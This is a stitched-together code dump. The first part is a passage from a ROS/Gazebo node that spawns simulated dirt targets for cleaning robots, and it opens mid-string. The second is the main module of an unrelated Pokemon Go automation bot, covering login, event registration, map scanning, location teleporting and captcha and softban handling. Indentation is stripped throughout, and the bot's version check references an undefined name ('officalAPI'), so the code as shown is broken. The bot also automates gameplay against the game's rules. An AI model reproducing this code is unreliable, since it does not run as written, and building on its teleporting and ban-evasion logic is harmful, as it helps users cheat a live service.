"cells. Generating next one...\n" % (
x, y))
return self.position_map[index], other_fp_duplicate
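    # Note on the sampling above (illustrative figures, not measured): the
    # Beta(2, 2) draw peaks at 0.5, so with len(self.position_map) == 1000 an
    # index is roughly three times more likely to land in [400, 600) than in
    # [0, 200); since position_map is filled row by row, dirt therefore
    # clusters in the middle rows of the map.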
def __spawn_dirt(self, dirt: GoalObject, fp_duplicate_flag):
"""
        Spawns a dirt object in the map at the position that was generated for the dirt passed in via the input
        parameter of this function.
        fp_duplicate_flag is True if a task/dirt is already spawned at this position as a false positive of another robot.
"""
# Init service
rospy.wait_for_service("gazebo/spawn_sdf_model")
spawn_model = rospy.ServiceProxy("gazebo/spawn_sdf_model", SpawnModel)
name = "dirt_" + str(self.spawn_number)
rospack = rospkg.RosPack()
pkg_path = rospack.get_path(DIRT_MODEL_PACKAGE)
path = pkg_path + "/" + DIRT_MODEL_NAME
with open(path, "r") as data:
model = data.read()
robot = "" # can be left empty
pose = dirt.pose
frame = "" # empty or "world" or "map"
# save name of model combined with position for future deletion (transmit it to goal_list where this is
# executed)
new_dirt_model = DirtModel(header=Header(stamp=rospy.get_rostime(), frame_id="map"), name=name, pose=pose)
self.goal_pub.publish(dirt)
# Spawn it
if not fp_duplicate_flag:
self.model_pub.publish(new_dirt_model)
spawn_model(name, model, robot, pose, frame)
rospy.loginfo(rospy.get_caller_id() + "\n\n\tNew dirt was spawned\n")
self.spawn_number += 1
def generation_process(self):
"""
        Generates random dirt objects repeatedly until the node is shut down
"""
# Sleep at the beginning because not everything is set up (nodes, topics)
rospy.sleep(1)
if not self.false_positive:
index = 0
while not rospy.is_shutdown():
# Create an (increasing) index, a random trust value and a random position for the new dirt
index += 1
trust_value = random.randint(TRUST_MIN, TRUST_MAX)
r_position, other_fp_duplicate = self.__generate_point_based_on_prob([])
pose = Pose(position=r_position,
orientation=Quaternion(x=0.0, y=0.0, z=0.0, w=1.0))
                # The position/point should already be in an empty (not occupied) cell, because it is only randomly
                # sampled from already free positions
# Combine everything in the new object
goal = GoalObject(index, pose, trust_value, []) # creates no false positives thus empty list
rospy.loginfo("\n\n\t(%d)Dirt/Goal generated: [ID: %d, (%f,%f),trust: %d]\n" % (self.seed,
goal.id, goal.pose.position.x, goal.pose.position.y, goal.trust_value))
# Spawn the dirt (if it is enabled)
self.__spawn_dirt(goal, other_fp_duplicate)
                # Sleep for the rest of the (randomly defined) time
# sleep_time = random.randint(TIME_MIN, TIME_MAX)
sleep_time = random.randint(self.time_interval_min, self.time_interval_max)
rospy.loginfo("\n\n\tDirt generation will sleep now for %d seconds.\n" % sleep_time)
rospy.sleep(sleep_time)
else:
# including false positive
next_spawn = copy.deepcopy(self.spawn_intervals)
index = 0
while not rospy.is_shutdown():
                # Find the timers that have run out and spawn a task for each of them
spawn_ind = numpy.where(next_spawn == min(next_spawn))[0]
for ind in spawn_ind:
index += 1
# Combine everything in the new object
if ind == 0:
# create new task.
r_position, other_fp_duplicate = self.__generate_point_based_on_prob([])
pose = Pose(position=r_position,
orientation=Quaternion(x=0.0, y=0.0, z=0.0, w=1.0))
# Ground Truth
goal = GoalObject(index, pose, TRUST_MAX, [])
rospy.loginfo("\n\n\t(%d)Dirt/Goal (GT) generated: [ID: %d, (%f,%f),trust: %d]\n" % (self.seed, goal.id, goal.pose.position.x, goal.pose.position.y, goal.trust_value))
else:
# create new task.
r_position, other_fp_duplicate = self.__generate_point_based_on_prob([ind - 1])
pose = Pose(position=r_position,
orientation=Quaternion(x=0.0, y=0.0, z=0.0, w=1.0))
# False Positive of robot ind - 1
goal = GoalObject(index, pose, TRUST_MAX, [ind - 1])
rospy.loginfo("\n\n\t(%d)Dirt/Goal (FP) generated: [ID: %d, (%f,%f),trust: %d, robot: %d]\n" % (self.seed, goal.id, goal.pose.position.x, goal.pose.position.y, goal.trust_value, ind - 1))
# Spawn the dirt (if it is enabled)
self.__spawn_dirt(goal, other_fp_duplicate)
                # Sleep for the rest of the (randomly defined) time
sleep_time = min(next_spawn)
rospy.loginfo("\n\n\tDirt generation will sleep now for %d seconds.\n" % sleep_time)
rospy.sleep(sleep_time)
# update the clocks and reset the ones that have reached 0
next_spawn = next_spawn - min(next_spawn)
next_spawn[spawn_ind] = self.spawn_intervals[spawn_ind]
def dirt_generator(self):
r = rospy.Rate(1)
# while not rospy.is_shutdown():
rospy.loginfo(f"[{NODE_NAME}] \n\tWaiting for occupancy map.")
self.occupancy_map = OccupancyMap.from_message(rospy.wait_for_message(BASE_MAP_TOPIC, OccupancyGrid))
# self.dirt_pos_tolerance = self.occupancy_map.resolution
self.__get_dirt_candidate_cells()
# Seed can be set with a parameter
random.seed(self.seed)
# Start generating+spawning dirt
thread1 = threading.Thread(target=self.generation_process)
thread1.start()
rospy.spin()
if __name__ == '__main__':
rospy.init_node(NODE_NAME, anonymous=True, log_level=rospy.INFO)
seed_ = rospy.get_param(f'~seed', 100)
spawn_interval_ = rospy.get_param(f'~spawn_interval', 10)
dg = DirtGenerator(seed_, spawn_interval_)
dg.dirt_generator()
|
__init__.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
import datetime
import json
import logging
import os
import random
import re
import sys
import time
import Queue
import threading
import shelve
import uuid
import urllib2
from geopy.geocoders import GoogleV3
from pgoapi import PGoApi
from pgoapi.utilities import f2i, get_cell_ids
from s2sphere import Cell, CellId, LatLng
from . import cell_workers
from .base_task import BaseTask
from .plugin_loader import PluginLoader
from .api_wrapper import ApiWrapper
from .cell_workers.utils import distance
from .event_manager import EventManager
from .human_behaviour import sleep
from .item_list import Item
from .metrics import Metrics
from .sleep_schedule import SleepSchedule
from pokemongo_bot.event_handlers import SocketIoHandler, LoggingHandler, SocialHandler, CaptchaHandler
from pokemongo_bot.socketio_server.runner import SocketIoRunner
from pokemongo_bot.websocket_remote_control import WebsocketRemoteControl
from pokemongo_bot.base_dir import _base_dir
from .worker_result import WorkerResult
from .tree_config_builder import ConfigException
from .tree_config_builder import MismatchTaskApiVersion
from .tree_config_builder import TreeConfigBuilder
from .inventory import init_inventory, player
from sys import platform as _platform
from pgoapi.protos.pogoprotos.enums import badge_type_pb2
from pgoapi.exceptions import AuthException, NotLoggedInException, ServerSideRequestThrottlingException, ServerBusyOrOfflineException, NoPlayerPositionSetException, HashingOfflineException
from pgoapi.hash_server import HashServer
class FileIOException(Exception):
pass
class PokemonGoBot(object):
@property
def position(self):
return self.api.actual_lat, self.api.actual_lng, self.api.actual_alt
@property
def noised_position(self):
return self.api.noised_lat, self.api.noised_lng, self.api.noised_alt
#@position.setter # these should be called through api now that gps replication is there...
#def position(self, position_tuple):
# self.api._position_lat, self.api._position_lng, self.api._position_alt = position_tuple
@property
def player_data(self):
"""
Returns the player data as received from the API.
:return: The player data.
:rtype: dict
"""
return self._player
@property
def inbox(self):
"""
Returns the inbox data as received from the API.
:return: The inbox data.
:rtype: dict
"""
return self._inbox
@property
def stardust(self):
dust = filter(lambda y: y['name'] == 'STARDUST', self._player['currencies'])[0]
if 'amount' in dust:
return dust['amount']
else:
return 0
@stardust.setter
def stardust(self, value):
dust = filter(lambda y: y['name'] == 'STARDUST', self._player['currencies'])[0]
if 'amount' in dust:
dust['amount'] = value
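    # The two accessors above assume a currencies list shaped like the API
    # response, e.g. (illustrative values only):
    #   self._player['currencies'] == [
    #       {'name': 'POKECOIN', 'amount': 120},
    #       {'name': 'STARDUST', 'amount': 20500},
    #   ]
    # so filter(...)[0] selects the STARDUST entry and its 'amount' is read or
    # updated in place.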
def __init__(self, db, config):
self.database = db
self.config = config
super(PokemonGoBot, self).__init__()
self.fort_timeouts = dict()
self.pokemon_list = json.load(
open(os.path.join(_base_dir, 'data', 'pokemon.json'))
)
self.item_list = json.load(open(os.path.join(_base_dir, 'data', 'items.json')))
# @var Metrics
self.metrics = Metrics(self)
self.latest_inventory = None
self.cell = None
self.recent_forts = [None] * config.forts_max_circle_size
self.tick_count = 0
self.softban = False
self.wake_location = None
self.start_position = None
self.last_map_object = None
self.last_time_map_object = 0
self.logger = logging.getLogger(type(self).__name__)
self.alt = self.config.gps_default_altitude
# Make our own copy of the workers for this instance
self.workers = []
        # Threading setup for file writing
self.web_update_queue = Queue.Queue(maxsize=1)
self.web_update_thread = threading.Thread(target=self.update_web_location_worker)
self.web_update_thread.start()
# Heartbeat limiting
self.heartbeat_threshold = self.config.heartbeat_threshold
self.heartbeat_counter = 0
self.last_heartbeat = time.time()
self.hb_locked = False # lock hb on snip
# Inventory refresh limiting
self.inventory_refresh_threshold = 10
self.inventory_refresh_counter = 0
self.last_inventory_refresh = time.time()
# Catch on/off
self.catch_disabled = False
self.capture_locked = False # lock catching while moving to VIP pokemon
# Inform bot if there's a response
self.empty_response = False
client_id_file_path = os.path.join(_base_dir, 'data', 'mqtt_client_id')
saved_info = shelve.open(client_id_file_path)
key = 'client_id'.encode('utf-8')
if key in saved_info:
self.config.client_id = saved_info[key]
else:
self.config.client_id = str(uuid.uuid4())
saved_info[key] = self.config.client_id
saved_info.close()
def start(self, bot):
self._setup_event_system(bot)
self.sleep_schedule = SleepSchedule(self, self.config.sleep_schedule) if self.config.sleep_schedule else None
if self.sleep_schedule:
self.sleep_schedule.work()
self._setup_api()
self._load_recent_forts()
init_inventory(self)
self.display_player_info()
self._print_character_info()
if self.config.pokemon_bag_show_at_start and self.config.pokemon_bag_pokemon_info:
self._print_list_pokemon()
random.seed()
def _setup_event_system(self, bot):
handlers = []
color = self.config.logging and 'color' in self.config.logging and self.config.logging['color']
debug = self.config.debug
handlers.append(LoggingHandler(color, debug))
handlers.append(SocialHandler(self))
handlers.append(CaptchaHandler(self, self.config.solve_captcha))
if self.config.websocket_server_url:
if self.config.websocket_start_embedded_server:
self.sio_runner = SocketIoRunner(self.config.websocket_server_url)
self.sio_runner.start_listening_async()
websocket_handler = SocketIoHandler(
self,
self.config.websocket_server_url
)
handlers.append(websocket_handler)
if self.config.websocket_remote_control:
remote_control = WebsocketRemoteControl(self).start()
# @var EventManager
self.event_manager = EventManager(bot, self.config.walker_limit_output, *handlers)
self._register_events()
if self.config.show_events:
self.event_manager.event_report()
sys.exit(1)
# Registering event:
# self.event_manager.register_event("location", parameters=['lat', 'lng'])
#
# Emitting event should be enough to add logging and send websocket
    # message:
    # self.event_manager.emit('location', level='info', data={'lat': 1, 'lng': 1})
def _register_events(self):
self.event_manager.register_event(
'location_found',
parameters=('position', 'location')
)
self.event_manager.register_event('api_error')
self.event_manager.register_event('config_error')
self.event_manager.register_event('captcha')
self.event_manager.register_event('login_started')
self.event_manager.register_event('login_failed')
self.event_manager.register_event('login_successful')
self.event_manager.register_event('niantic_warning')
self.event_manager.register_event('set_start_location')
self.event_manager.register_event('load_cached_location')
self.event_manager.register_event('location_cache_ignored')
self.event_manager.register_event('debug')
self.event_manager.register_event('refuse_to_sit')
self.event_manager.register_event('reset_destination')
self.event_manager.register_event('new_destination')
self.event_manager.register_event('moving_to_destination')
self.event_manager.register_event('arrived_at_destination')
self.event_manager.register_event('staying_at_destination')
self.event_manager.register_event('buddy_pokemon', parameters=('pokemon', 'iv', 'cp'))
self.event_manager.register_event('buddy_reward', parameters=('pokemon', 'family', 'candy_earned', 'candy'))
self.event_manager.register_event('buddy_walked', parameters=('pokemon', 'distance_walked', 'distance_needed'))
# ignore candy above threshold
self.event_manager.register_event(
'ignore_candy_above_thresold',
parameters=(
'name',
'amount',
'threshold'
)
)
self.event_manager.register_event('followpath_output_disabled')
self.event_manager.register_event(
'position_update',
parameters=(
'current_position',
'last_position',
'distance', # optional
'distance_unit' # optional
)
)
self.event_manager.register_event(
'path_lap_update',
parameters=(
'number_lap',
'number_lap_max'
)
)
self.event_manager.register_event(
'path_lap_end',
parameters=(
'duration',
'resume'
)
)
self.event_manager.register_event('location_cache_error')
self.event_manager.register_event('security_check')
self.event_manager.register_event('bot_start')
self.event_manager.register_event('bot_exit')
self.event_manager.register_event('bot_interrupted')
# sleep stuff
self.event_manager.register_event(
'next_sleep',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_sleep',
parameters=(
'time_hms',
'wake'
)
)
# random pause
self.event_manager.register_event(
'next_random_pause',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_random_pause',
parameters=(
'time_hms',
'resume'
)
)
# recycle stuff
self.event_manager.register_event(
'next_force_recycle',
parameters=(
'time'
)
)
self.event_manager.register_event('force_recycle')
# random alive pause
self.event_manager.register_event(
'next_random_alive_pause',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_random_alive_pause',
parameters=(
'time_hms',
'resume'
)
)
# fort stuff
self.event_manager.register_event(
'spun_fort',
parameters=(
'fort_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'lured_pokemon_found',
parameters=(
'fort_id',
'fort_name',
'encounter_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'moving_to_hunter_target',
parameters=(
'target_name',
'distance'
)
)
self.event_manager.register_event(
'moving_to_fort',
parameters=(
'fort_name',
'target_type',
'distance'
)
)
self.event_manager.register_event(
'moving_to_lured_fort',
parameters=(
'fort_name',
'target_type',
'distance',
'lure_distance'
)
)
self.event_manager.register_event(
'spun_pokestop',
parameters=(
'pokestop', 'exp', 'items', 'stop_kind', 'spin_amount_now'
)
)
self.event_manager.register_event(
'pokestop_empty',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_out_of_range',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_on_cooldown',
parameters=('pokestop', 'minutes_left')
)
self.event_manager.register_event(
'unknown_spin_result',
parameters=('status_code',)
)
self.event_manager.register_event('pokestop_searching_too_often')
self.event_manager.register_event('arrived_at_fort')
# pokemon stuff
self.event_manager.register_event(
'catchable_pokemon',
parameters=(
'pokemon_id',
'spawn_point_id',
'encounter_id',
'latitude',
'longitude',
'expiration_timestamp_ms',
'pokemon_name'
)
)
self.event_manager.register_event(
'incensed_pokemon_found',
parameters=(
'pokemon_id',
'encounter_id',
'encounter_location',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'pokemon_appeared',
parameters=(
'pokemon',
'ncp',
'cp',
'iv',
'iv_display',
'encounter_id',
'latitude',
'longitude',
'pokemon_id',
'shiny'
)
)
self.event_manager.register_event('no_pokeballs')
self.event_manager.register_event('enough_ultraballs')
self.event_manager.register_event('lure_success')
self.event_manager.register_event('lure_failed')
self.event_manager.register_event('lure_not_enough')
self.event_manager.register_event('lure_info')
self.event_manager.register_event(
'pokemon_catch_rate',
parameters=(
'catch_rate',
'ball_name',
'berry_name',
'berry_count'
)
)
self.event_manager.register_event(
'threw_berry',
parameters=(
'berry_name',
'ball_name',
'new_catch_rate'
)
)
self.event_manager.register_event(
'threw_pokeball',
parameters=(
'throw_type',
'spin_label',
'ball_name',
'success_percentage',
'count_left'
)
)
self.event_manager.register_event(
'pokemon_capture_failed',
parameters=('pokemon',)
)
self.event_manager.register_event(
'pokemon_vanished',
parameters=(
'pokemon',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event(
'vanish_limit_reached',
parameters=(
'duration',
'resume'
)
)
self.event_manager.register_event('pokemon_not_in_range')
self.event_manager.register_event('pokemon_inventory_full')
self.event_manager.register_event(
'pokemon_caught',
parameters=(
'pokemon',
'ncp', 'cp', 'iv', 'iv_display', 'exp',
'shiny',
'stardust',
'encounter_id',
'latitude',
'longitude',
'pokemon_id',
'daily_catch_limit',
'caught_last_24_hour',
)
)
self.event_manager.register_event(
'pokemon_vip_caught',
parameters=(
'pokemon',
'ncp', 'cp', 'iv', 'iv_display', 'exp',
'shiny',
'stardust',
'encounter_id',
'latitude',
'longitude',
'pokemon_id',
'daily_catch_limit',
'caught_last_24_hour',
)
)
self.event_manager.register_event(
'pokemon_evolved',
parameters=('pokemon', 'new', 'iv', 'old_cp', 'cp', 'candy', 'xp')
)
self.event_manager.register_event(
'pokemon_favored',
parameters=('pokemon', 'iv', 'cp')
)
self.event_manager.register_event(
'pokemon_unfavored',
parameters=('pokemon', 'iv', 'cp')
)
self.event_manager.register_event(
'pokemon_evolve_check',
parameters=('has', 'needs')
)
self.event_manager.register_event(
'pokemon_upgraded',
parameters=('pokemon', 'iv', 'cp', 'new_cp', 'candy', 'stardust')
)
self.event_manager.register_event('skip_evolve')
self.event_manager.register_event('threw_berry_failed', parameters=('status_code',))
self.event_manager.register_event('vip_pokemon')
self.event_manager.register_event('gained_candy', parameters=('gained_candy', 'quantity', 'type'))
self.event_manager.register_event('catch_limit')
self.event_manager.register_event('spin_limit')
self.event_manager.register_event('show_best_pokemon', parameters=('pokemons'))
self.event_manager.register_event('revived_pokemon')
self.event_manager.register_event('healing_pokemon')
# level up stuff
self.event_manager.register_event(
'level_up',
parameters=(
'previous_level',
'current_level'
)
)
self.event_manager.register_event(
'level_up_reward',
parameters=('items',)
)
# lucky egg
self.event_manager.register_event(
'used_lucky_egg',
parameters=('amount_left',)
)
self.event_manager.register_event('lucky_egg_error')
# softban
self.event_manager.register_event('softban')
self.event_manager.register_event('softban_fix')
self.event_manager.register_event('softban_fix_done')
# egg incubating
self.event_manager.register_event(
'incubate_try',
parameters=(
'incubator_id',
'egg_id'
)
)
self.event_manager.register_event(
'incubate',
parameters=('distance_in_km',)
)
self.event_manager.register_event(
'next_egg_incubates',
parameters=('eggs_left', 'eggs_inc', 'eggs')
)
self.event_manager.register_event('incubator_already_used')
self.event_manager.register_event('egg_already_incubating')
self.event_manager.register_event(
'egg_hatched',
parameters=(
'name', 'cp', 'ncp', 'iv_ads', 'iv_pct', 'exp', 'stardust', 'candy'
)
)
self.event_manager.register_event('egg_hatched_fail')
# discard item
self.event_manager.register_event(
'item_discarded',
parameters=(
'amount', 'item', 'maximum'
)
)
self.event_manager.register_event(
'item_discard_skipped',
parameters=('space',)
)
self.event_manager.register_event(
'item_discard_fail',
parameters=('item',)
)
# inventory
self.event_manager.register_event('inventory_full')
# release
self.event_manager.register_event(
'keep_best_release',
parameters=(
'amount', 'pokemon', 'criteria'
)
)
self.event_manager.register_event(
'future_pokemon_release',
parameters=(
'pokemon', 'cp', 'iv', 'ivcp', 'below_iv', 'below_cp', 'below_ivcp', 'cp_iv_logic'
)
)
self.event_manager.register_event(
'pokemon_release',
parameters=('pokemon', 'iv', 'cp', 'ivcp', 'candy', 'candy_type')
)
self.event_manager.register_event(
'pokemon_keep',
parameters=('pokemon', 'iv', 'cp', 'ivcp')
)
# polyline walker
self.event_manager.register_event(
'polyline_request',
parameters=('url',)
)
# cluster
self.event_manager.register_event(
'found_cluster',
parameters=(
'num_points', 'forts', 'radius', 'distance'
)
)
self.event_manager.register_event(
'arrived_at_cluster',
parameters=(
'num_points', 'forts', 'radius'
)
)
# rename
self.event_manager.register_event(
'rename_pokemon',
parameters=('old_name', 'current_name',)
)
self.event_manager.register_event(
'pokemon_nickname_invalid',
parameters=('nickname',)
)
self.event_manager.register_event(
'unset_pokemon_nickname',
parameters=('old_name',)
)
# Move To map pokemon
self.event_manager.register_event(
'move_to_map_pokemon_fail',
parameters=('message',)
)
self.event_manager.register_event(
'move_to_map_pokemon_updated_map',
parameters=('lat', 'lon')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_to',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_encounter',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_move_towards',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_back',
parameters=('last_lat', 'last_lon')
)
self.event_manager.register_event(
'moving_to_pokemon_throught_fort',
parameters=('fort_name', 'distance','poke_name','poke_dist')
)
self.event_manager.register_event(
'move_to_map_pokemon',
parameters=('message')
)
# cached recent_forts
self.event_manager.register_event('loaded_cached_forts')
self.event_manager.register_event('cached_fort')
self.event_manager.register_event(
'no_cached_forts',
parameters=('path', )
)
self.event_manager.register_event(
'error_caching_forts',
parameters=('path', )
)
# database shit
self.event_manager.register_event('catch_log')
self.event_manager.register_event('vanish_log')
self.event_manager.register_event('evolve_log')
self.event_manager.register_event('login_log')
self.event_manager.register_event('transfer_log')
self.event_manager.register_event('pokestop_log')
self.event_manager.register_event('softban_log')
self.event_manager.register_event('eggs_hatched_log')
self.event_manager.register_event(
'badges',
parameters=('badge', 'level')
)
self.event_manager.register_event(
'player_data',
parameters=('player_data', )
)
self.event_manager.register_event(
'forts_found',
parameters=('json')
)
# UseIncense
self.event_manager.register_event(
'use_incense',
parameters=('type', 'incense_count')
)
# BuddyPokemon
self.event_manager.register_event(
'buddy_update',
parameters=('name')
)
self.event_manager.register_event(
'buddy_update_fail',
parameters=('name', 'error')
)
self.event_manager.register_event(
'buddy_candy_earned',
parameters=('candy', 'family', 'quantity', 'candy_earned', 'candy_limit')
)
self.event_manager.register_event('buddy_candy_fail')
self.event_manager.register_event(
'buddy_next_reward',
parameters=('name', 'km_walked', 'km_total')
)
self.event_manager.register_event('buddy_keep_active')
self.event_manager.register_event(
'buddy_not_available',
parameters=('name')
)
# Sniper
self.event_manager.register_event('sniper_log', parameters=('message', 'message'))
self.event_manager.register_event('sniper_error', parameters=('message', 'message'))
self.event_manager.register_event('sniper_teleporting', parameters=('latitude', 'longitude', 'name'))
# Catch-limiter
self.event_manager.register_event('catch_limit_on')
self.event_manager.register_event('catch_limit_off')
self.event_manager.register_event(
'pokemon_knock_out_gym',
parameters=('pokemon', 'gym_name', 'notification_date', 'awarded_coins', 'awarded_coins_today')
)
self.event_manager.register_event(
'pokemon_hungy',
parameters=('pokemon', 'gym_name', 'notification_date')
)
def tick(self):
self.health_record.heartbeat()
self.cell = self.get_meta_cell()
if self.sleep_schedule:
self.sleep_schedule.work()
now = time.time() * 1000
for fort in self.cell["forts"]:
timeout = fort.get("cooldown_complete_timestamp_ms", 0)
if timeout >= now:
self.fort_timeouts[fort["id"]] = timeout
self._refresh_inventory()
self.tick_count += 1
# Check if session token has expired
self.check_session(self.position)
for worker in self.workers:
if worker.work() == WorkerResult.RUNNING:
return
def get_meta_cell(self):
location = self.position[0:2]
cells = self.find_close_cells(*location)
# Combine all cells into a single dict of the items we care about.
forts = []
wild_pokemons = []
catchable_pokemons = []
nearby_pokemons = []
for cell in cells:
if "forts" in cell and len(cell["forts"]):
forts += cell["forts"]
if "wild_pokemons" in cell and len(cell["wild_pokemons"]):
wild_pokemons += cell["wild_pokemons"]
if "catchable_pokemons" in cell and len(cell["catchable_pokemons"]):
catchable_pokemons += cell["catchable_pokemons"]
if "nearby_pokemons" in cell and len(cell["nearby_pokemons"]):
latlng = LatLng.from_point(Cell(CellId(cell["s2_cell_id"])).get_center())
for p in cell["nearby_pokemons"]:
p["latitude"] = latlng.lat().degrees
p["longitude"] = latlng.lng().degrees
p["s2_cell_id"] = cell["s2_cell_id"]
nearby_pokemons += cell["nearby_pokemons"]
# If there are forts present in the cells sent from the server or we don't yet have any cell data, return all data retrieved
if len(forts) > 1 or not self.cell:
return {
"forts": forts,
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons,
"nearby_pokemons": nearby_pokemons
}
# If there are no forts present in the data from the server, keep our existing fort data and only update the pokemon cells.
else:
return {
"forts": self.cell["forts"],
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons,
"nearby_pokemons": nearby_pokemons
}
def update_web_location(self, cells=[], lat=None, lng=None, alt=None):
# we can call the function with no arguments and still get the position
# and map_cells
if lat is None:
lat = self.api._position_lat
if lng is None:
lng = self.api._position_lng
if alt is None:
alt = self.api._position_alt
        # don't cache when teleporting
if self.api.teleporting:
return
if cells == []:
location = self.position[0:2]
cells = self.find_close_cells(*location)
user_data_cells = os.path.join(_base_dir, 'data', 'cells-%s.json' % self.config.username)
try:
with open(user_data_cells, 'w') as outfile:
json.dump(cells, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_web_location = os.path.join(
_base_dir, 'web', 'location-%s.json' % self.config.username
)
# alt is unused atm but makes using *location easier
try:
with open(user_web_location, 'w') as outfile:
json.dump({
'lat': lat,
'lng': lng,
'alt': alt,
'cells': cells
}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_data_lastlocation = os.path.join(
_base_dir, 'data', 'last-location-%s.json' % self.config.username
)
try:
with open(user_data_lastlocation, 'w') as outfile:
json.dump({'lat': lat, 'lng': lng, 'alt': alt, 'start_position': self.start_position}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
def emit_forts_event(self,response_dict):
map_objects = response_dict.get(
'responses', {}
).get('GET_MAP_OBJECTS', {})
status = map_objects.get('status', None)
map_cells = []
if status and status == 1:
map_cells = map_objects['map_cells']
if map_cells and len(map_cells):
for cell in map_cells:
if "forts" in cell and len(cell["forts"]):
self.event_manager.emit(
'forts_found',
sender=self,
level='debug',
formatted='Found forts {json}',
data={'json': json.dumps(cell["forts"])}
)
def find_close_cells(self, lat, lng):
cellid = get_cell_ids(lat, lng)
timestamp = [0, ] * len(cellid)
response_dict = self.get_map_objects(lat, lng, timestamp, cellid)
map_objects = response_dict.get(
'responses', {}
).get('GET_MAP_OBJECTS', {})
status = map_objects.get('status', None)
map_cells = []
if status and status == 1:
map_cells = map_objects['map_cells']
position = (lat, lng, 0)
map_cells.sort(
key=lambda x: distance(
lat,
lng,
x['forts'][0]['latitude'],
x['forts'][0]['longitude']) if x.get('forts', []) else 1e6
)
return map_cells
def check_session(self, position):
# Check session expiry
if self.api._auth_provider and self.api._auth_provider._ticket_expire:
            # prevent a crash if the returned value is not numeric
            if not str(self.api._auth_provider._ticket_expire).isdigit():
                self.logger.info("Ticket expired value is not numeric")
remaining_time = \
self.api._auth_provider._ticket_expire / 1000 - time.time()
if remaining_time < 60:
self.event_manager.emit(
'api_error',
sender=self,
level='info',
formatted='Session stale, re-logging in.'
)
self.api = ApiWrapper(config=self.config)
self.api.set_position(*position)
self.login()
def login(self):
status = {}
retry = 0
quit_login = False
self.event_manager.emit(
'login_started',
sender=self,
level='info',
formatted="Login procedure started."
)
lat, lng = self.position[0:2]
self.api.set_position(lat, lng, self.alt) # or should the alt be kept at zero?
while not quit_login:
try:
self.api.login(
self.config.auth_service,
str(self.config.username),
str(self.config.password))
# No exception, set quit_login = true
quit_login = True
except AuthException as e:
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted='Login process failed: {}'.format(e)
)
# Exception encountered. Retry 3 times, increasing the wait time by 5 secs each retry
retry += 1
sleeptime = retry*5
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted="Retry {} time(s) for {} secs".format(retry,sleeptime)
)
sleep(retry*5)
# Quit after 3rd tries
if retry == 3:
sys.exit()
with self.database as conn:
c = conn.cursor()
c.execute("SELECT COUNT(name) FROM sqlite_master WHERE type='table' AND name='login'")
result = c.fetchone()
if result[0] == 1:
conn.execute('''INSERT INTO login (timestamp, message) VALUES (?, ?)''', (time.time(), 'LOGIN_SUCCESS'))
else:
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted="Login table not founded, skipping log"
)
self.event_manager.emit(
'login_successful',
sender=self,
level='info',
formatted="Login successful."
)
# Start of security, to get various API Versions from different sources
# Get Official API
link = "https://pgorelease.nianticlabs.com/plfe/version"
f = urllib2.urlopen(link)
myfile = f.read()
f.close()
officialAPI = myfile[2:8]
self.event_manager.emit(
'security_check',
sender=self,
level='info',
formatted="Niantic Official API Version: {}".format(officalAPI)
)
PGoAPI_version = PGoApi.get_api_version()
PGoAPI_version_str = str(PGoAPI_version)
PGoAPI_version_str = "0."+ PGoAPI_version_str[0:2] + "." + PGoAPI_version_str[-1]
self.event_manager.emit(
'security_check',
sender=self,
level='info',
formatted="Bot is currently running on API {}".format(PGoAPI_version_str)
)
if self.config.check_niantic_api is True:
if HashServer.endpoint == "":
self.event_manager.emit(
'security_check',
sender=self,
level='info',
formatted="Warning: Bot is running on legacy API"
)
else:
officialAPI_int = int(officialAPI.replace('.', ''))
PGoAPI_version_tmp = str(PGoAPI_version)
PGoAPI_version_tmp = PGoAPI_version_tmp[0:2] + PGoAPI_version_tmp[-1]
PGoAPI_version_int = int(PGoAPI_version_tmp)
if PGoAPI_version_int < officialAPI_int:
self.event_manager.emit(
'security_check',
sender=self,
level='info',
formatted="We have detected a Pokemon API Change. Latest Niantic Version is: {}. Program Exiting...".format(officalAPI)
)
sys.exit(1)
else:
self.event_manager.emit(
'security_check',
sender=self,
level='info',
formatted="Current PGoAPI is using {} API. Niantic API Check Pass".format(PGoAPI_version_str)
)
self.heartbeat()
def _setup_api(self):
# instantiate pgoapi @var ApiWrapper
self.api = ApiWrapper(config=self.config)
# provide player position on the earth
self._set_starting_position()
self.login()
# chain subrequests (methods) into one RPC call
self.logger.info('')
# send empty map_cells and then our position
self.update_web_location()
def _print_character_info(self):
# get player profile call
# ----------------------
request = self.api.create_request()
request.get_player()
response_dict = request.call()
# print('Response dictionary: \n\r{}'.format(json.dumps(response_dict, indent=2)))
currency_1 = "0"
currency_2 = "0"
warn = False
if response_dict:
self._player = response_dict['responses']['GET_PLAYER']['player_data']
if 'warn' in response_dict['responses']['GET_PLAYER']:
warn = response_dict['responses']['GET_PLAYER']['warn']
player = self._player
else:
self.logger.info(
"The API didn't return player info, servers are unstable - "
"retrying.", 'red'
)
sleep(5)
self._print_character_info()
return
# @@@ TODO: Convert this to d/m/Y H:M:S
creation_date = datetime.datetime.fromtimestamp(
player['creation_timestamp_ms'] / 1e3)
creation_date = creation_date.strftime("%Y/%m/%d %H:%M:%S")
pokecoins = '0'
